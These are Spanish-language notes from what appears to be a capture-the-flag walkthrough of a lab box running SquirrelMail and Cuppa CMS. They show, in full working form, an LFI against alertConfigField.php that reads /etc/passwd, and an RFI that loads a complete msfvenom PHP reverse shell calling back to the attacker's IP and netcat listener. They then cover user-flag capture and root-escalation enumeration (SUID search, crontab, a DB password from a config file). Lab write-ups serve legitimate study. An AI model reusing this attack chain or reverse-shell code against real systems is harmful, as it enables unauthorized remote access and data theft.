PROBAMOS DESCOMENTANDO ESTE BOTOS <a> Y NOS APARECE EN EL FORM EL BOTON PARA RECUPERAR LA CONTRASEÑA, PERO NOS FIJAMOS EN EL MAIL DE SQUIRRELMAIL Y NO NOS LLEGA NADA AUN ; VIENDO EN EL PANEL DE MAIL CONFIRMAMOS QUE EL MAIL DE RECUOPERACION NUESTRO LO ESTAMOS PONIENDO BIEN milesdyson@skynet , PERO AUN NO NOS LLEGA EL MAIL DE PASSWD, INTENTAMOS DE NUEVO VER SI LLEGABA ALGO A SSH, POP3 , IMAP, SMB Y NADA; ALGO NO ESTA FUNCIONANDO COMO SE DEBE AL MOMENTO DE RECUPERAR LA CONTRASEÑLA:
Current Folder: INBOX Sign Out
Compose Addresses Folders Options Search Help SquirrelMail
Viewing Full Header - View message
Return-Path: <skynet@skynet>
X-Original-To: milesdyson
Delivered-To: milesdyson@skynet
Received: from localhost (localhost [127.0.0.1])
by skynet (Postfix) with SMTP id C1C36111
for <milesdyson>; Tue, 17 Sep 2019 22:10:55 -0500 (CDT)
Subject: Samba Password reset
Message-Id: <20190918031102.C1C36111@skynet>
Date: Tue, 17 Sep 2019 22:10:55 -0500 (CDT)
From: skynet@skynet
NO LOGRAMOS QUE NOS MANDE EL MAIL DE CAMBIO DE CONTRASEÑA... :(
-------------- PROBANDO EL SCRIPT DEL EXPLOIT , Y MANUALMENTE LA INCLUSION DE ARCHIVOS LFI TENIENDO EXITO LO LEEMOS DESE EL BROWSER Y CON CURL TAMBIEN -----
curl -s --data-urlencode urlConfig=../../../../../../../../../../../etc/passwd http://10.10.37.103/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?
http://10.10.37.103/45kra24zxs28v3yd/administrator/alertConfigField.php%20?urlConfig=/../../../../etc/passwd
LEEMOS EL ETC/PASSWD POR LFI:
http://10.10.37.103/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../../../etc/passwd
RESULTADO:
Field configuration:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false messagebus:x:107:111::/var/run/dbus:/bin/false uuidd:x:108:112::/run/uuidd:/bin/false dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin milesdyson:x:1001:1001:,,,:/home/milesdyson:/bin/bash dovecot:x:111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false dovenull:x:112:120:Dovecot login user,,,:/nonexistent:/bin/false postfix:x:113:121::/var/spool/postfix:/bin/false mysql:x:114:123:MySQL Server,,,:/nonexistent:/bin/false
TRATAMOS DE LEER ETC/SHADOW:
http://10.10.37.103/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../../../etc/shadow
NO ARROJA INFO POR QUE SEGURO NO TENEMOS PRIVILEGIOS.
----
┌──(root㉿kali)-[~]
└─# curl -s --data-urlencode urlConfig=../../../../../../../../../../../etc/passwd http://10.10.37.103/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?
<script>
function CloseDefaultAlert(){
SetAlert(false, "", "#alert");
setTimeout(function () {SetBlockade(false)}, 200);
}
function ShowAlert(){
_width = '';
_height = '';
jQuery('#alert').animate({width:parseInt(_width), height:parseInt(_height), 'margin-left':-(parseInt(_width)*0.5)+20, 'margin-top':-(parseInt(_height)*0.5)+20 }, 300, "easeInOutCirc", CompleteAnimation);
function CompleteAnimation(){
jQuery("#btnClose_alert").css('visibility', "visible");
jQuery("#description_alert").css('visibility', "visible");
jQuery("#content_alert").css('visibility', "visible");
}
}
</script>
<div class="alert_config_field" id="alert" style="z-index:;">
<div class="btnClose_alert" id="btnClose_alert" onclick="javascript:CloseDefaultAlert();"></div>
<div class="description_alert" id="description_alert"><b>Field configuration: </b></div>
<div class="separator" style="margin-bottom:15px;"></div>
<div id="content_alert" class="content_alert">
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
milesdyson:x:1001:1001:,,,:/home/milesdyson:/bin/bash
dovecot:x:111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:112:120:Dovecot login user,,,:/nonexistent:/bin/false
postfix:x:113:121::/var/spool/postfix:/bin/false
mysql:x:114:123:MySQL Server,,,:/nonexistent:/bin/false
</div>
</div>
---------- TRATAMOS E PASAR A UN RFI PARA INCLUIR NUESTRO ARCHIVO DE SHELL REVERSA QUE CREAMOS CON MSFCONSOLE CON NUESTRA IP Y PUERTO: --------------------------------------------------
MESVENOM:
┌──(root㉿kali)-[~]
└─# msfvenom -p php/reverse_php LHOST=10.10.76.203 LPORT=4444
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 3046 bytes
/*<?php /**/
@error_reporting(0);
@set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);
$dis=@ini_get('disable_functions');
if(!empty($dis)){
$dis=preg_replace('/[, ]+/', ',', $dis);
$dis=explode(',', $dis);
$dis=array_map('trim', $dis);
}else{
$dis=array();
}
$ipaddr='10.10.76.203';
$port=4444;
if(!function_exists('eiMIFOUfpKRJ')){
function eiMIFOUfpKRJ($c){
global $dis;
if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
$c=$c." 2>&1\n";
}
$AOXWF='is_callable';
$KNHExnS='in_array';
if($AOXWF('proc_open')and!$KNHExnS('proc_open',$dis)){
$handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
$o=NULL;
while(!feof($pipes[1])){
$o.=fread($pipes[1],1024);
}
@proc_close($handle);
}else
if($AOXWF('exec')and!$KNHExnS('exec',$dis)){
$o=array();
exec($c,$o);
$o=join(chr(10),$o).chr(10);
}else
if($AOXWF('popen')and!$KNHExnS('popen',$dis)){
$fp=popen($c,'r');
$o=NULL;
if(is_resource($fp)){
while(!feof($fp)){
$o.=fread($fp,1024);
}
}
@pclose($fp);
}else
if($AOXWF('system')and!$KNHExnS('system',$dis)){
ob_start();
system($c);
$o=ob_get_contents();
ob_end_clean();
}else
if($AOXWF('passthru')and!$KNHExnS('passthru',$dis)){
ob_start();
passthru($c);
$o=ob_get_contents();
ob_end_clean();
}else
if($AOXWF('shell_exec')and!$KNHExnS('shell_exec',$dis)){
$o=shell_exec($c);
}else
{
$o=0;
}
return $o;
}
}
$nofuncs='no exec functions';
if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
$s=@fsockopen("tcp://10.10.76.203",$port);
while($c=fread($s,2048)){
$out = '';
if(substr($c,0,3) == 'cd '){
chdir(substr($c,3,-1));
} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
break;
}else{
$out=eiMIFOUfpKRJ(substr($c,0,-1));
if($out===false){
fwrite($s,$nofuncs);
break;
}
}
fwrite($s,$out);
}
fclose($s);
}else{
$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
@socket_connect($s,$ipaddr,$port);
@socket_write($s,"socket_create");
while($c=@socket_read($s,2048)){
$out = '';
if(substr($c,0,3) == 'cd '){
chdir(substr($c,3,-1));
} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
break;
}else{
$out=eiMIFOUfpKRJ(substr($c,0,-1));
if($out===false){
@socket_write($s,$nofuncs);
break;
}
}
@socket_write($s,$out,strlen($out));
}
@socket_close($s);
}
SERVIDOR PYTHON SIRVIENDOMJKMI ARCHIVO PARA COMPARTIRLO POR LA URL VULNERABLE DEL SERVICIO CUPPA:
┌──(root㉿kali)-[~]
└─# python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
URL PAR INCLUIR NUESTRO ARCHIVO DE SHELL REVERSA A CUPPA Y SE EJECUTA AL INSTANTE QUE SE ENVIA YA ESTANDO A ALA ESCUCHA CON NUESTRO LISTENER DE NETCAT:
http://10.10.37.103/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.76.203:8080/shell.php
BINGO SE TENZO ESCUCHAMOS LA CONECCION REVERSA DE NUESTRO SHELL:PHP CARGADO EN CUPPA POR LA BULNERABILIDAD DE RFI:
:D
┌──(root㉿kali)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.76.203] from (UNKNOWN) [10.10.37.103] 40220
whoami
www-data
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
milesdyson:x:1001:1001:,,,:/home/milesdyson:/bin/bash
dovecot:x:111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:112:120:Dovecot login user,,,:/nonexistent:/bin/false
postfix:x:113:121::/var/spool/postfix:/bin/false
mysql:x:114:123:MySQL Server,,,:/nonexistent:/bin/false
CONSEGUIMOS LA BANDERA FLAG DE USUARIO MILESDYSON SE SIGUE TENZANDO:
ls
alertConfigField.php
alertIFrame.php
alertImage.php
defaultAlert.php
pwd
/var/www/html/45kra24zxs28v3yd/administrator/alerts
cd ..
cd ..
cd ..
ls
45kra24zxs28v3yd
admin
ai
config
css
image.png
index.html
js
style.css
pwd
/var/www/html
cd ..
pwd
/var/www
ls
html
cd ..
ls
backups
cache
crash
lib
local
lock
log
mail
opt
run
snap
spool
tmp
www
cd ..
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
cd home
ls
milesdyson
cd mylesdyson
ls
milesdyson
pwd
/home
cd milesdyson
ls
backups
mail
share
user.txt
cat user.txt
7ce5c2109a40f958099283600a9ae807
------------------- ESCALADA DE PRIVILEGIOS --------------------------
VAMOS A PIOR LA DE ROOT:
VEMOS LOS BINARIOS CON BITSUID:
find / -type f -perm -04000 -ls 2>/dev/null
279429 36 -rwsr-xr-x 1 root root 35600 Mar 6 2017 /sbin/mount.cifs
260157 40 -rwsr-xr-x 1 root root 40152 May 16 2018 /bin/mount
277101 32 -rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
260206 28 -rwsr-xr-x 1 root root 27608 May 16 2018 /bin/umount
260171 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
260188 40 -rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
260172 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
260602 56 -rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd
264411 136 -rwsr-xr-x 1 root root 136808 Jun 10 2019 /usr/bin/sudo
260591 40 -rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp
260525 76 -rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd
292080 24 -rwsr-xr-x 1 root root 23376 Mar 27 2019 /usr/bin/pkexec
260464 40 -rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh
277225 36 -rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newgidmap
279238 52 -rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at
277224 36 -rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newuidmap
260462 52 -rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn
260424 44 -rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
277205 40 -rwsr-xr-x 1 root root 38984 Jun 14 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
292076 16 -rwsr-xr-x 1 root root 14864 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
260788 12 -rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
279893 100 -rwsr-sr-x 1 root root 98472 Mar 18 2019 /usr/lib/snapd/snap-confine
277718 420 -rwsr-xr-x 1 root root 428240 Mar 4 2019 /usr/lib/openssh/ssh-keysign
-----------------
VEMOS LAS VARIABLÑES DE ENTORNO:
env
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/html/45kra24zxs28v3yd/administrator/alerts
--------------
VEMOS LAS TAREAS PROGRAMADAS CRONHOBS:
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
INTENTAR HACER QUE EJECUTE EL ARCHIVO POR ROOT CON LAS CRONHOBS:
echo "/bin/bash > backup.sh
-----------
VEMOS EL ARCHIVO CONFIG.PHP
pwd
/var/www/html/45kra24zxs28v3yd/administrator
cat Configuration.php
<?php
class Configuration{
public $host = "localhost";
public $db = "cuppa";
public $user = "root";
public $password = "password123";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "";
public $secure_login_redirect = "";
}
VEMOS LOS DIRECTORIOS ESCRIBIBLES:
find / -writable 2>/dev/null
/home/milesdyson/.bash_history
/tmp
/tmp/.Test-unix
/tmp/.ICE-unix
/tmp/.font-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/sys/kernel/security/apparmor/.null
/sys/kernel/security/apparmor/policy/.remove
/sys/kernel/security/apparmor/policy/.replace
/sys/kernel/security/apparmor/policy/.load
/sys/kernel/security/apparmor/.remove
/sys/kernel/security/apparmor/.replace
/sys/kernel/security/apparmor/.load
/sys/kernel/security/apparmor/.ns_name
/sys/kernel/security/apparmor/.ns_level
/sys/kernel/security/apparmor/.ns_stacked
/sys/kernel/security/apparmor/.stacked
/sys/kernel/security/apparmor/.access
/sys/fs/cgroup/memory/cgroup.event_control
/sys/fs/cgroup/memory/user.slice/cgroup.event_control
/sys/fs/cgroup/memory/init.scope/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/irqbalance.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/lxd-containers.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/apport.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/polkitd.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/open-iscsi.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-random-seed.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/grub-common.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-journal-flush.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-user-sessions.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/nmbd.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/unattended-upgrades.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/dovecot.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/ondemand.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/lvm2-monitor.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/dev-disk-by\x2duuid-354616bf\x2d923c\x2d43d3\x2da040\x2dae36babbbab3.swap/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/iscsid.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/resolvconf.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/dbus.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/var-lib-lxcfs.mount/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/postfix.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-modules-load.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/samba-ad-dc.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/winbind.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/smbd.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/ssh.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-tmpfiles-setup.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/system-serial\x2dgetty.slice/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/ifup@eth0.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-remount-fs.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-update-utmp.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/keyboard-setup.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/apparmor.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/rc-local.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/mysql.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/cron.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/apache2.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/acpid.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/networking.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-tmpfiles-setup-dev.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/atd.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/console-setup.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/snapd.seeded.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/kmod-static-nodes.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/ufw.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/dev-xvda5.swap/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-sysctl.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/-.mount/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/mdadm.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/setvtrgb.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-udev-trigger.service/cgroup.event_control
/lib/systemd/system/reboot.service
/lib/systemd/system/mountall-bootclean.service
/lib/systemd/system/rmnologin.service
/lib/systemd/system/umountfs.service
/lib/systemd/system/stop-bootlogd-single.service
/lib/systemd/system/mountkernfs.service
/lib/systemd/system/stop-bootlogd.service
/lib/systemd/system/checkroot-bootclean.service
/lib/systemd/system/samba.service
/lib/systemd/system/single.service
/lib/systemd/system/bootmisc.service
/lib/systemd/system/mountnfs-bootclean.service
/lib/systemd/system/mountnfs.service
/lib/systemd/system/killprocs.service
/lib/systemd/system/bootlogd.service
/lib/systemd/system/mountall.service
/lib/systemd/system/hwclock.service
/lib/systemd/system/cryptdisks-early.service
/lib/systemd/system/checkfs.service
/lib/systemd/system/cryptdisks.service
/lib/systemd/system/rcS.service
/lib/systemd/system/checkroot.service
/lib/systemd/system/hostname.service
/lib/systemd/system/rc.service
/lib/systemd/system/screen-cleanup.service
/lib/systemd/system/umountnfs.service
/lib/systemd/system/halt.service
/lib/systemd/system/sendsigs.service
/lib/systemd/system/umountroot.service
/lib/systemd/system/mountdevsubfs.service
/lib/systemd/system/motd.service
/lib/systemd/system/lvm2.service
/lib/systemd/system/bootlogs.service
/lib/systemd/system/fuse.service
/lib/systemd/system/x11-common.service
/dev/mqueue
/dev/log
/dev/shm
/dev/char/5:0
/dev/char/5:2
/dev/char/10:200
/dev/char/10:229
/dev/char/1:5
/dev/char/1:9
/dev/char/1:8
/dev/char/1:3
/dev/char/1:7
/dev/stderr
/dev/stdout
/dev/stdin
/dev/fd
/dev/net/tun
/dev/ptmx
/dev/fuse
/dev/tty
/dev/urandom
/dev/random
/dev/full
/dev/zero
/dev/null
/var/tmp
/var/lib/squirrelmail/data
/var/lib/lxcfs/proc
/var/lib/lxcfs/cgroup
/var/lib/php/sessions
/var/spool/squirrelmail/attach
/var/spool/postfix/dev/urandom
/var/spool/postfix/dev/random
/var/spool/postfix/dev/log
/var/spool/samba
/var/cache/apache2/mod_cache_disk
/var/crash
/var/www/html
/var/www/html/js
/var/www/html/index.html
/var/www/html/45kra24zxs28v3yd
/var/www/html/45kra24zxs28v3yd/index.html
/var/www/html/45kra24zxs28v3yd/miles.jpg
/var/www/html/45kra24zxs28v3yd/administrator
/var/www/html/45kra24zxs28v3yd/administrator/js
/var/www/html/45kra24zxs28v3yd/administrator/js/jquery.md5.js
/var/www/html/45kra24zxs28v3yd/administrator/js/jquery.validate.js
/var/www/html/45kra24zxs28v3yd/administrator/js/jquery-ui.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tu_functions.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tu_checkBoxHelp.js
/var/www/html/45kra24zxs28v3yd/administrator/js/Copy of tu_main.js
/var/www/html/45kra24zxs28v3yd/administrator/js/jquery.sha1.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tu_comboBoxHelp.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tu_stringHelp.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tu_main.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/tiny_mce_popup.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/utils
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/utils/editable_selects.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/utils/form_utils.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/utils/validate.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/utils/mctabs.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/tiny_mce_src.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/tiny_mce.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/bbcode
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/bbcode/editor_plugin_src.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/bbcode/editor_plugin.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/save
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/save/editor_plugin_src.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/save/editor_plugin.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/insertdatetime
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/insertdatetime/editor_plugin_src.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/plugins/insertdatetime/editor_plugin.js
